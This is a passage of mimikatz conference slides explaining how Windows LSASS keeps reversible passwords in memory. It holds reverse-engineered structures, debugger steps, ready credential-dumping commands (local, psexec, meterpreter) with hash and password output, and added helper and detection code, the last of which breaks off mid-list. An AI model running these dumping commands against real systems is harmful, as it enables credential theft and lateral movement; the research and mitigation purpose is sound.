mimikatz
Benjamin DELPY `gentilkiwi`
focus on sekurlsa / pass-the-pass and crypto patches
Who ? Why ?

Benjamin DELPY `gentilkiwi`
– French
– 26y
– Kiwi addict
– Lazy programmer

Started to code mimikatz to :
– explain security concepts ;
– improve my knowledge ;
– prove to Microsoft that sometimes they must change old habits.

Why all in French ?
– because I’m
– it limits script kiddies usage
– hack with class

07/11/2012 - Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com
mimikatz :: working

On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
– x86 & x64
– 2000 support dropped with mimikatz 1.0

Everywhere ; it’s statically compiled

Two modes
– direct action (local commands)
– process or driver communication
mimikatz :: architecture of sekurlsa & crypto

(diagram) mimikatz.exe and the service processes it talks to :
– KeyIso « Isolation de clé CNG » (CNG Key Isolation), hosted in LSASS.EXE
  • direct action : crypto::patchcng
– EventLog « Journal d’événements Windows » (Windows Event Log), hosted in SVCHOST.EXE
  • direct action : divers::eventdrop
– SamSS « Gestionnaire de comptes de sécurité » (Security Accounts Manager), hosted in LSASS.EXE
  • sekurlsa.dll is injected with VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...
  • the injected DLL opens a pipe, writes a welcome message, waits for commands… and returns results
(diagram) mimikatz.exe components

Command modules : mod_mimikatz_sekurlsa, mod_mimikatz_nogpo, mod_mimikatz_divers, mod_mimikatz_winmine, mod_mimikatz_impersonate, mod_mimikatz_inject, mod_mimikatz_samdump, mod_mimikatz_standard, mod_mimikatz_crypto, mod_mimikatz_handle, mod_mimikatz_system, mod_mimikatz_service, mod_mimikatz_process, mod_mimikatz_thread, mod_mimikatz_terminalserver, mod_mimikatz_privilege

Shared libraries : mod_pipe, mod_inject, mod_memory, mod_parseur, mod_patch, mod_hive, mod_secacl, mod_privilege, mod_process, mod_service, mod_system, mod_thread, mod_ts, mod_text, mod_crypto, mod_cryptoapi, mod_cryptoacng

Security package parsers in mimikatz.exe : msv_1_0, tspkg, wdigest, livessp, kerberos

Side binaries : kappfree.dll, kelloworld.dll, klock.dll, mimikatz.sys, sekurlsa.dll

sekurlsa.dll side : sam, secrets, msv_1_0, wdigest, livessp, kerberos, tspkg
mimikatz :: sekurlsa :: what is it ? (mod_mimikatz_sekurlsa)

A module replacement for my previous favorite library !

A local module that can read data from the SamSS service (the well known LSASS process)

What the sekurlsa module can dump :
– MSV1_0 hashes
– TsPkg passwords
– Wdigest passwords
– LiveSSP passwords
– Kerberos passwords (!)
– …?
mimikatz :: sekurlsa :: how LSA works (PLAYSKOOL level)

(diagram) WinLogon collects user:domain:password and hands it to LsaSS. Inside LSASS, the authentication packages (msv1_0, tspkg, wdigest, livessp, kerberos) receive the credentials ; the authentication itself is done by msv1_0 (challenge / response against the SAM) or by kerberos.
mimikatz :: sekurlsa :: how LSA works (PLAYSKOOL level)

Authentication packages :
– take the user’s credentials from the logon
– do their own stuff
– keep enough data in memory to compute responses to challenges (Single Sign On)

If we can get this data, and inject it in another LSASS session, we skip the authentication part

This is the principle of « Pass-the-hash »
– in fact, of « Pass-the-x »
mimikatz :: sekurlsa :: history of « pass-the-* » 1/2

Pass-the-hash
– 1997 - Unix modified SAMBA client for hashes usage ; Paul Ashton (EIGEN)
– 2000 - private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity)
– 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) presents msvctl, and provides some downloads of it
– 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
– 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French ; so not famous ;))
2007 was the year of pass the hash !

Pass-the-ticket
– 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support ; Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa :: history of « pass-the-* » 2/2

Pass-the-pass
– 05/2011 – mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  • http://blog.gentilkiwi.com/securite/pass-the-pass
– 05/2011 – return of mimikatz ; it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  • http://blog.gentilkiwi.com/securite/re-pass-the-pass
– 05/2011 – some organizations opened cases to Microsoft about it… …lots of time…
– beginning of 2012 - lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
– 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  • http://seclists.org/pen-test/2012/Mar/7
– 03/2012 – mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
– 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
  • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
– 08/2012 – sekurlsa module without injection at all ! (ultra safe)
  • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it ?

Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApps and RemoteDesktop user experience
– http://technet.microsoft.com/library/cc772108.aspx

It relies on CredSSP with Credentials Delegation (!= account delegation)
– Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf

First impression : it seems cool
– the user does not have to type its password
– the password is not in the RDP file
– the password is not in the user secrets
mimikatz :: sekurlsa :: tspkg :: questions ?

The KB says that for it to work, we must enable « Default credentials » delegation
– “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
  • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
– In all cases, the system seems to be vulnerable to pass-the-*…

In what form ? Our specs : [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • The TSPasswordCreds structure contains the user's password credentials that are delegated to the server. (or PIN)

    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }

– Challenge / response for authentication ?
  • Server : YES (TLS / Kerberos)
  • Client : NO ; the *password* is sent to the server…

So the password resides somewhere in memory ?
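To make the "Client : NO" point concrete, here is an added example (not from the talk and not mimikatz code) that encodes and decodes the TSPasswordCreds structure quoted above in DER. It shows that what the client delegates is the literal password, only wrapped by the TLS tunnel. Two things are my assumptions rather than text from the slide: that each field is an EXPLICIT context-specific tag wrapping an OCTET STRING, and that the OCTET STRING payloads are UTF-16LE, which is how CredSSP carries them.

```python
"""DER codec for [MS-CSSP] TSPasswordCreds (added example, not from the deck).

Assumed layout (not stated on the slide):
  SEQUENCE {
    [0] EXPLICIT OCTET STRING domainName   -- UTF-16LE
    [1] EXPLICIT OCTET STRING userName     -- UTF-16LE
    [2] EXPLICIT OCTET STRING password     -- UTF-16LE
  }
"""

SEQUENCE = 0x30
OCTET_STRING = 0x04


def _der_len(n: int) -> bytes:
    """DER length: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(value)) + value


def _ctx(index: int, inner: bytes) -> bytes:
    """EXPLICIT context-specific constructed tag [index] = 0xA0 | index."""
    return _tlv(0xA0 | index, inner)


def encode_ts_password_creds(domain: str, user: str, password: str) -> bytes:
    fields = [domain, user, password]
    body = b"".join(
        _ctx(i, _tlv(OCTET_STRING, s.encode("utf-16-le"))) for i, s in enumerate(fields)
    )
    return _tlv(SEQUENCE, body)


def _read_tlv(buf: bytes, pos: int):
    """Parse one TLV starting at pos; return (tag, value, position after it)."""
    tag = buf[pos]
    first = buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def decode_ts_password_creds(der: bytes) -> dict:
    tag, body, _ = _read_tlv(der, 0)
    if tag != SEQUENCE:
        raise ValueError("TSPasswordCreds must be a SEQUENCE")
    names = {0: "domainName", 1: "userName", 2: "password"}
    out, pos = {}, 0
    while pos < len(body):
        ctag, inner, pos = _read_tlv(body, pos)
        itag, value, _ = _read_tlv(inner, 0)
        if itag != OCTET_STRING:
            raise ValueError("expected OCTET STRING inside [%d]" % (ctag & 0x1F))
        out[names[ctag & 0x1F]] = value.decode("utf-16-le")
    return out


def password_is_in_clear(der: bytes, password: str) -> bool:
    """The slide's point: the password bytes appear verbatim inside the blob."""
    return password.encode("utf-16-le") in der


if __name__ == "__main__":
    # Constructed sample values for the demo; not real credentials.
    blob = encode_ts_password_creds("CONTOSO", "alice", "Winter2012!")
    print(blob.hex())
    print(decode_ts_password_creds(blob))
    print("password visible in DER:", password_is_in_clear(blob, "Winter2012!"))
```

Run it and compare the hex dump with the decoded dictionary: there is no hash step anywhere, so any component that can see the decrypted CredSSP payload, including the LSASS-side provider that stores it for later SSO, holds the password itself.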
mimikatz :: sekurlsa :: tspkg :: symbols & theory

Let’s explore some symbols !
– sounds cool… (thanks Microsoft)

  kd> x tspkg!*clear*
  75016d1c tspkg!TSObtainClearCreds = <no type information>
  kd> x tspkg!*password*
  75011b68 tspkg!TSDuplicatePassword = <no type information>
  75011cd4 tspkg!TSHidePassword = <no type information>
  750195ee tspkg!TSRevealPassword = <no type information>
  75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>
  kd> x tspkg!*locate*
  7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

Let’s imagine a scenario
– enumerate all sessions to obtain :
  • Username
  • Domain
  • LUID
– call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain :
  • TS_CREDENTIAL
– call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
  • TS_PRIMARY_CREDENTIAL with clear text credentials…
mimikatz :: sekurlsa :: tspkg :: workflow

(diagram) LsaEnumerateLogonSessions → for each LUID → tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

  typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
      PVOID unk0;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Password;
  } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

  typedef struct _KIWI_TS_CREDENTIAL {
  #ifdef _M_X64
      BYTE unk0[108];
  #elif defined _M_IX86
      BYTE unk0[64];
  #endif
      LUID LocallyUniqueIdentifier;
      PVOID unk1;
      PVOID unk2;
      PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
  } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time !
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it ?

“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”
Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

“Common Digest Authentication Scenarios :
– Authenticated client access to a Web site
– Authenticated client access using SASL
– Authenticated client access with integrity protection to a directory service using LDAP”
Microsoft : http://technet.microsoft.com/library/cc778868.aspx

Again, it seems cool
– no password over the network, just hashes
– no reversible password in Active Directory ; hashes for each realm
  • only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it ?

We speak about hashes, but what hashes ?
  H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI:[…])

Even after login, HA1 may change… the realm comes from the server side and cannot be determined before the Windows logon

The WDigest provider must have the elements to compute responses for different servers :
– Username
– Realm (from server)
– Password
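The HA1 / HA2 / H formulas above are RFC 2617 Digest; the following added example (mine, not from the talk or from mimikatz) computes them so the dependency is visible: HA1 is keyed by the realm, the realm only arrives in the server's challenge, so a client that wants to answer an unknown realm later needs the password (or a pre-computed HA1 for every realm it will ever see). The test values are the worked example from RFC 2617 section 3.5; the qop-less form follows the original RFC 2069 formula, which is what the "[…]" in the slide elides.

```python
"""RFC 2617 Digest computation (added example, not from the deck).

Shows why a Digest client keeps the password after logon: HA1 depends on the
realm, and the realm is only known once the server sends its challenge.
"""
import hashlib


def _md5(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password): the only term that needs the password."""
    return _md5(f"{username}:{realm}:{password}")


def ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth or no qop."""
    return _md5(f"{method}:{digest_uri}")


def digest_response(username, realm, password, method, digest_uri, nonce,
                    nc=None, cnonce=None, qop=None) -> str:
    """H = MD5(HA1:nonce:[nc:cnonce:qop:]HA2).

    With qop=None this is the RFC 2069 form MD5(HA1:nonce:HA2); with qop="auth"
    it is the RFC 2617 form that adds the nonce count and client nonce.
    """
    a1, a2 = ha1(username, realm, password), ha2(method, digest_uri)
    if qop is None:
        return _md5(f"{a1}:{nonce}:{a2}")
    return _md5(f"{a1}:{nonce}:{nc}:{cnonce}:{qop}:{a2}")


def ha1_per_realm(username: str, password: str, realms) -> dict:
    """What a password-free client would have to store instead: one HA1 per
    realm it may ever talk to. A realm not in this table cannot be answered
    without the password, which is the reason WDigest keeps it."""
    return {realm: ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # Values below are the public RFC 2617 example, not real credentials.
    user, realm, pwd = "Mufasa", "testrealm@host.com", "Circle Of Life"
    nonce = "dcd98b7102dd2f0e8b11d0f600bfb0c093"
    print("HA1     :", ha1(user, realm, pwd))
    print("HA2     :", ha2("GET", "/dir/index.html"))
    print("response:", digest_response(user, realm, pwd, "GET", "/dir/index.html",
                                       nonce, nc="00000001", cnonce="0a4f113b", qop="auth"))
    print(ha1_per_realm(user, pwd, ["testrealm@host.com", "other-realm"]))
```

Note that `ha1_per_realm` is exactly the "hashes for each realm" stored by Advanced Digest on the domain controller side; it works there because the DC knows the realm list in advance, and it cannot work on the client side for the reason the slide gives.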
mimikatz :: sekurlsa :: wdigest :: theory

This time, we know :
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)

LsaUnprotectMemory
– at offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– let’s search for it in WDigest :
    .text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
– hypothesis seems verified

LsaProtectMemory
– at offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– let’s search for it in WDigest :
    .text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
– SpAcceptCredentials takes the clear password in its args
  • protects it with LsaProtectMemory
  • updates or inserts data in a doubly linked list : wdigest!l_LogSessList
mimikatz :: sekurlsa :: wdigest :: workflow

(diagram) LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList (search the linked list for the LUID) → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear !

  typedef struct _KIWI_WDIGEST_LIST_ENTRY {
      struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
      struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
      DWORD UsageCount;
      struct _KIWI_WDIGEST_LIST_ENTRY *This;
      LUID LocallyUniqueIdentifier;
      […]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
      […]
  } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time !
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how

Actually, I had only used a logical (empirical) approach to search for passwords… :
– protocol reading
– symbols searching
~ boring ~

… let’s be more brutal this time : make a WinDBG trap !

  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe
  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context
  to be switched. When the debugger breaks in again, you will be in
  the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  ............................................................
  0: kd> bp /p @$proc lsasrv!LsaProtectMemory "kc 5 ; g"
  0: kd> g
mimikatz :: sekurlsa :: livessp :: how

Let’s log in with a Live account on Windows 8 !

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2            ← our LiveSSP provider
  livessp!SpiLogonUserEx2

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials           ← yeah, Pass the Hash capability with Live account too…

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials            ← Live user can logon through RDP via SSO

After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
  [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp :: workflow

(diagram) LsaEnumerateLogonSessions → for each LUID → livessp!LiveGlobalLogonSessionList (search the linked list for the LUID) → KIWI_LIVESSP_LIST_ENTRY → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

  typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
      DWORD isSupp;
      DWORD unk0;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

  typedef struct _KIWI_LIVESSP_LIST_ENTRY {
      struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
      struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
      DWORD unk4;
      DWORD unk5;
      PVOID unk6;
      LUID LocallyUniqueIdentifier;
      LSA_UNICODE_STRING UserName;
      PVOID unk7;
      PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
  } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*

* Me, yes
mimikatz :: sekurlsa :: kerberos

Let’s log in with a normal account

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials         ← Kerberos, ticket part ? Maybe ;)

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials         ← Kerberos part for password ??????

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

After credentials protection, KerbCreateLogonSession calls :
– NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5 ; KerbInsertLogonSession to insert data in KerbLogonSessionList
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow

(diagram) LsaEnumerateLogonSessions → for each LUID → Kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

  typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
      DWORD unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
  #ifdef _M_X64
      BYTE unk4[32];
  #elif defined _M_IX86
      BYTE unk4[20];
  #endif
      LUID LocallyUniqueIdentifier;
  #ifdef _M_X64
      BYTE unk5[44];
  #elif defined _M_IX86
      BYTE unk5[36];
  #endif
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow

(diagram) LsaEnumerateLogonSessions → for each LUID → kerberos!KerbLogonSessionList (search the linked list for the LUID) → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear !

  typedef struct _KIWI_KERBEROS_LOGON_SESSION {
      struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
      struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
      DWORD UsageCount;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      DWORD unk3;
      DWORD unk4;
      PVOID unk5;
      PVOID unk6;
      PVOID unk7;
      LUID LocallyUniqueIdentifier;
  #ifdef _M_IX86
      DWORD unk8;
  #endif
      DWORD unk9;
      DWORD unk10;
      PVOID unk11;
      DWORD unk12;
      DWORD unk13;
      PVOID unk14;
      PVOID unk15;
      PVOID unk16;
      […]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time !
Final sekurlsa demo
sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: “hu ?”

Ok, it works…* But why ?
* not for every logon on NT5 (an unlock may be needed)

From my understanding of Microsoft explanations
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)

Microsoft’s implementation of Kerberos is full of logic…
– for password auth :
  • password hash for shared secret, but keeping the password in memory
– for full smartcard auth :
  • no password on client
  • no hash on client ?
    – NTLM hash on client…
    – KDC sent it back as a gift
mimikatz :: sekurlsa :: LsaUnprotectMemory

All passwords in memory are encrypted, but in a reversible way so they can be used

We used LsaUnprotectMemory, in the LSASS context, to decrypt them
– this function relies on LsaEncryptMemory from lsasrv.dll

For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to benefit from its keys when we called it

Can it be fun to decrypt outside the process ?
– Yes, it is… no more injection, just reading the memory of the LSASS process…

mimikatz can use lsasrv.dll too and “imports” the LSASS initialized keys
– when we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we get the same behaviour as when we are in LSASS !
mimikatz :: sekurlsa :: LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses :
– RC4
– DESx

(diagram) key material held by lsasrv inside lsass :
  g_cbRandomKey : DWORD ; 256
  g_pRandomKey  @ BYTE[g_cbRandomKey]
  g_pDESXKey    @ BYTE[144]
  g_Feedback    : BYTE[8]
mimikatz loads its own lsasrv and copies… these values into it
mimikatz :: sekurlsa :: LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses :
– 3DES
– AES

(diagram) key material held by lsasrv inside lsass :
  InitializationVector : BYTE[16]
  h3DesKey → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA
  hAesKey  → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA
mimikatz loads its own lsasrv and copies… these into it

  typedef struct _KIWI_BCRYPT_KEY_DATA {
      DWORD size;
      DWORD tag;
      DWORD type;
      DWORD unk0;
      DWORD unk1;
      DWORD unk2;
      DWORD unk3;
      PVOID unk4;
      BYTE data; /* etc... */
  } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

  typedef struct _KIWI_BCRYPT_KEY {
      DWORD size;
      DWORD type;
      PVOID unk0;
      PKIWI_BCRYPT_KEY_DATA cle;
      PVOID unk1;
  } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo

Security Packages
  Package          Symbols                                Type
  tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                  LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                   lsasrv!LogonSessionListCount           ULONG

Protection Keys
  Key NT5   Symbols
  RC4       lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx      lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key NT6   Symbols
            lsasrv!InitializationVector
  3DES      lsasrv!h3DesKey
  AES       lsasrv!hAesKey
mimikatz :: sekurlsa :: memo

Some commands :

  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit

  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit

  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
  mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

  mimikatz # sekurlsa::logonPasswords full

  Authentification Id         : 0;234870
  Package d'authentification  : NTLM
  Utilisateur principal       : Gentil Kiwi
  Domaine d'authentification  : vm-w8-rp-x
          msv1_0 :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
           * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
          kerberos :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234/
          wdigest :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234/
          tspkg :
           * Utilisateur  : Gentil Kiwi
           * Domaine      : vm-w8-rp-x
           * Mot de passe : waza1234/
          livessp :
           n.t. (LUID KO)
mimikatz :: sekurlsa :: what can we do ?

Basics
– no physical access to the computer (first step to pass the hash, then pass the pass)
– no admin rights / system rights / debug privileges (…)
– disable local admin accounts
– strong passwords (haha, it was a joke ; so useless !!!)
– for privileged accounts, network logon instead of interactive (when possible)
– audit ; pass the hash leaves traces and can lock accounts
– no admin rights / system rights / debug privileges, even for VIPs
– use a separate network (or forest) for privileged tasks

More in depth
– force strong authentication (SmartCard & Token) : $ / €
– short validity for Kerberos tickets
– no delegation
– disable NTLM (available with NT6)
– nothing exotic :
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– stop using shared secrets for authentication : push public / private stuff (like keys ;))
– leave opportunities to stop retro compatibility
– disable faulty providers ?
  • is it supported by Microsoft ?
  • even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?
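The "audit" item above is about pass-the-hash traces on the target; the same idea applies one step earlier, on the host where the secrets are read. Both sekurlsa variants described in this deck need a handle to LSASS: the injecting one needs VirtualAllocEx / WriteProcessMemory / CreateRemoteThread rights, the injection-free one of 08/2012 only needs to read process memory. The following added example (mine, not from the talk, not mimikatz code) turns that into a small detector over constructed Sysmon-style ProcessAccess (Event ID 10) records. The key=value line format and the allowlist are my own for the example; the access-right bit values are the documented Win32 PROCESS_* constants.

```python
"""Detect LSASS handle opens that match the two sekurlsa access patterns.

Added example, not from the deck. Input lines are a constructed key=value
rendering of Sysmon Event ID 10 (ProcessAccess); real Sysmon is XML/EVTX.
"""
import re

# Documented Win32 process access rights.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# sekurlsa.dll injection: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD
# injection-free sekurlsa module: ReadProcessMemory only
READ_MASK = PROCESS_VM_READ

# Processes that legitimately open lsass.exe on a typical host. Constructed
# for the example; tune per environment and keep it short.
ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1400",
    "EventID=10 SourceImage=C:\\Users\\kiwi\\Desktop\\mimikatz.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410",
    "EventID=10 SourceImage=C:\\Users\\kiwi\\Desktop\\mimikatz.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x143a",
    "EventID=10 SourceImage=C:\\tools\\procexp.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1fffff",
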